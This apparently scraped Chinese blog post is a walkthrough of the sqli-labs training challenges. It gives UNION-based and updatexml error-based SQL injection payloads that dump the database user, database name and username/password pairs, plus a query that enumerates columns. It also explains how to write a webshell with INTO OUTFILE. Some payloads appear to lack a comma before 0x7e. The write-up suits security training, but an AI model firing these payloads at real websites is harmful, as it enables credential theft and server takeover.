0
点赞
收藏
分享

微信扫一扫

声临其境!体验阿里云开源音频基座大模型——FunAudioLLM

夹胡碰 2024-08-05 阅读 34

Less-1

在这里插入图片描述
首先,可以看见该界面,该关卡主要是SQL注入,由于对用户的输入没有做过滤,使查询语句进入到了数据库中,查询到了本不应该查询到的数据
首先,如果想要进入内部,就要绕过,首先是用 ’ 绕过,当然,绕过后会有一个 ’ 空余,所以要 “- -空格”来注释掉,然后通过联合查询来查询到用户权限和数据库名
在这里插入图片描述

?id=-1' union select 1 ,user(),database()--+

在这里插入图片描述
因为该网页代码id输入有 ’ ’ ,是字符型注入,要单,双引号闭合,所以要 ’ 来绕过。接下来,按照相同的操作,查询出列名,表明和库名,就能进行登录了

Less-2

先看看源代码
在这里插入图片描述
这个一眼就知道,是数字型注入,不用单,双引号,所以可以直接进行注入

?id=-1 union select 1 ,user(),database()--+

在这里插入图片描述
对比上一题,少输一个 ’ ,表示不用 ’ 来绕过,直接注入就行

Less-5

先查看代码:
在这里插入图片描述
看到error,明显应该使用报错注入

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),1,32)0x7e),1)--+

在这里插入图片描述
这里我使用updatexml报错函数来注入输出,通过错误报告来显示想要查询的信息,但是,注意:这个输出只能输出32个字节,所以想要查询到后面的数据,可以用substr函数来设置输出字段,如下图:

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),32,64)0x7e),1)--+

在这里插入图片描述

Less-6

和Less-5题还是一样的

?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+

在这里插入图片描述

Less-7

mysql如何导出webshell,如何上传webshell:

运用outfile函数

还要3个条件,条件苛刻

1、mysql用户权限必须为root
2、必须知道网站的物理路径,使自己能够知道并访问
3、secure_file_priv为空,表示可以导到任何目录下面

但是我的secure_file_priv文件有目录,只能导入到 C:\ProgramData\MySQL\MySQL Server 5.7\Uploads\中,不能导入到指定文件,无法复现。
在这里插入图片描述

举报

相关推荐

微调大模型-3-微调基座模型

0 条评论